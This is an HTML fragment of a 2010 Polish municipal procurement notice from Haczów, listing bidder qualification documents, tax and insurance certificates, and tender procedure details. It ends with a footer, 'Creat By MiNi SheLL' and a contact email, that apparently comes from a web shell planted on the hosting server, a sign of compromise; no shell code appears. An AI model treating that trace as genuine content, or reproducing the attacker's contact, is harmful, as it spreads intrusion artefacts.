Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a) wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy   dostawy  w celu realizacji zamówienia wraz z informacją o podstawie dysponowania  tymi zasobami;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje  osobami zdolnymi do wykonania zamówienia, jeżeli:
a) dysponuje lub dysponował będzie  osobami do wykonania zamówienia 		                         
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:  
a) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją   o podstawie do dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu dokonania oceny w/w warunku niezbędne są:
a) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których
wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się ewentualną zmianę terminu wykonania  umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.haczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Haczów, 36-213 Haczów  nr 573, pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2010 godzina 09:30, miejsce: Urząd Gminy Haczów, 36-213 Haczów  nr 573, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com